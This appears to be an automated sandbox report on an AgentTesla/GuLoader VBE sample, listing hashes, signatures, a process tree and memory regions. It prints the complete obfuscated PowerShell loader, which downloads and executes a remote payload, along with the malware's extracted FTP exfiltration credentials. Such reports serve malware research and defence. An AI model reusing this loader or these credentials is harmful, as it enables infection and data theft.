Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2023 17:07

General

  • Target

    DH-087481 IMG.vbe

  • Size

    81KB

  • MD5

    b0e1835d06d4ae28eb1e1cee627360ea

  • SHA1

    31c82a2038f281fcc43377706d00c79c1d07bcee

  • SHA256

    34f4d416f700e77ef730f4ee4207218e7a3f978fc40efd8b7a399d58113d26b5

  • SHA512

    506479a1dd46f52000a175b779c1882610e432bfa4341ce0e4eaca975b9cc7f1ae45618bd68cfe934484e2347c2f9cb070c6e8b0c01938134a7fa7047a1c23df

  • SSDEEP

    1536:vZL/8DxkbzqcfC+bxucaTm1oF65imB6WgF8/SEcLuwI4u7293H:Br8DxMzpf5xuha1oFuiG6hyKJpI4uy93

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.cefin.bg
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    #UuXy?6cIbL+

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH-087481 IMG.vbe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4328
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2508

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gy2d3pyx.g2h.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1792-42-0x00007FFFBF7B0000-0x00007FFFC0271000-memory.dmp

    Filesize

    10.8MB

  • memory/1792-10-0x00007FFFBF7B0000-0x00007FFFC0271000-memory.dmp

    Filesize

    10.8MB

  • memory/1792-12-0x000002AA650A0000-0x000002AA650B0000-memory.dmp

    Filesize

    64KB

  • memory/1792-11-0x000002AA650A0000-0x000002AA650B0000-memory.dmp

    Filesize

    64KB

  • memory/1792-13-0x000002AA650A0000-0x000002AA650B0000-memory.dmp

    Filesize

    64KB

  • memory/1792-67-0x00007FFFBF7B0000-0x00007FFFC0271000-memory.dmp

    Filesize

    10.8MB

  • memory/1792-9-0x000002AA67320000-0x000002AA67342000-memory.dmp

    Filesize

    136KB

  • memory/1792-43-0x000002AA650A0000-0x000002AA650B0000-memory.dmp

    Filesize

    64KB

  • memory/2508-57-0x000000006F380000-0x00000000705D4000-memory.dmp

    Filesize

    18.3MB

  • memory/2508-53-0x0000000000F00000-0x00000000026D6000-memory.dmp

    Filesize

    23.8MB

  • memory/2508-75-0x0000000020720000-0x0000000020730000-memory.dmp

    Filesize

    64KB

  • memory/2508-74-0x0000000074D40000-0x00000000754F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2508-71-0x0000000000F00000-0x00000000026D6000-memory.dmp

    Filesize

    23.8MB

  • memory/2508-70-0x00000000217E0000-0x00000000217EA000-memory.dmp

    Filesize

    40KB

  • memory/2508-69-0x0000000021860000-0x00000000218F2000-memory.dmp

    Filesize

    584KB

  • memory/2508-68-0x0000000021770000-0x00000000217C0000-memory.dmp

    Filesize

    320KB

  • memory/2508-61-0x000000006F380000-0x000000006F3C0000-memory.dmp

    Filesize

    256KB

  • memory/2508-63-0x0000000020720000-0x0000000020730000-memory.dmp

    Filesize

    64KB

  • memory/2508-62-0x0000000074D40000-0x00000000754F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2508-59-0x0000000000F00000-0x00000000026D6000-memory.dmp

    Filesize

    23.8MB

  • memory/2508-56-0x0000000077761000-0x0000000077881000-memory.dmp

    Filesize

    1.1MB

  • memory/2508-55-0x00000000777E8000-0x00000000777E9000-memory.dmp

    Filesize

    4KB

  • memory/4328-38-0x0000000007080000-0x00000000070A2000-memory.dmp

    Filesize

    136KB

  • memory/4328-37-0x0000000007120000-0x00000000071B6000-memory.dmp

    Filesize

    600KB

  • memory/4328-17-0x0000000002710000-0x0000000002720000-memory.dmp

    Filesize

    64KB

  • memory/4328-16-0x0000000002710000-0x0000000002720000-memory.dmp

    Filesize

    64KB

  • memory/4328-44-0x0000000074D40000-0x00000000754F0000-memory.dmp

    Filesize

    7.7MB

  • memory/4328-46-0x0000000002710000-0x0000000002720000-memory.dmp

    Filesize

    64KB

  • memory/4328-47-0x0000000002710000-0x0000000002720000-memory.dmp

    Filesize

    64KB

  • memory/4328-48-0x0000000002710000-0x0000000002720000-memory.dmp

    Filesize

    64KB

  • memory/4328-49-0x00000000074E0000-0x00000000074E1000-memory.dmp

    Filesize

    4KB

  • memory/4328-50-0x00000000088E0000-0x000000000A0B6000-memory.dmp

    Filesize

    23.8MB

  • memory/4328-51-0x00000000088E0000-0x000000000A0B6000-memory.dmp

    Filesize

    23.8MB

  • memory/4328-52-0x0000000077761000-0x0000000077881000-memory.dmp

    Filesize

    1.1MB

  • memory/4328-40-0x0000000007470000-0x0000000007492000-memory.dmp

    Filesize

    136KB

  • memory/4328-54-0x00000000088E0000-0x000000000A0B6000-memory.dmp

    Filesize

    23.8MB

  • memory/4328-39-0x0000000008330000-0x00000000088D4000-memory.dmp

    Filesize

    5.6MB

  • memory/4328-41-0x00000000074F0000-0x0000000007504000-memory.dmp

    Filesize

    80KB

  • memory/4328-15-0x0000000002550000-0x0000000002586000-memory.dmp

    Filesize

    216KB

  • memory/4328-18-0x0000000005110000-0x0000000005738000-memory.dmp

    Filesize

    6.2MB

  • memory/4328-35-0x0000000007700000-0x0000000007D7A000-memory.dmp

    Filesize

    6.5MB

  • memory/4328-36-0x0000000006440000-0x000000000645A000-memory.dmp

    Filesize

    104KB

  • memory/4328-34-0x0000000002710000-0x0000000002720000-memory.dmp

    Filesize

    64KB

  • memory/4328-60-0x0000000074D40000-0x00000000754F0000-memory.dmp

    Filesize

    7.7MB

  • memory/4328-64-0x00000000088E0000-0x000000000A0B6000-memory.dmp

    Filesize

    23.8MB

  • memory/4328-14-0x0000000074D40000-0x00000000754F0000-memory.dmp

    Filesize

    7.7MB

  • memory/4328-33-0x0000000005ED0000-0x0000000005F1C000-memory.dmp

    Filesize

    304KB

  • memory/4328-32-0x0000000005EA0000-0x0000000005EBE000-memory.dmp

    Filesize

    120KB

  • memory/4328-31-0x00000000058E0000-0x0000000005C34000-memory.dmp

    Filesize

    3.3MB

  • memory/4328-21-0x0000000005870000-0x00000000058D6000-memory.dmp

    Filesize

    408KB

  • memory/4328-20-0x0000000005070000-0x00000000050D6000-memory.dmp

    Filesize

    408KB

  • memory/4328-19-0x0000000004FC0000-0x0000000004FE2000-memory.dmp

    Filesize

    136KB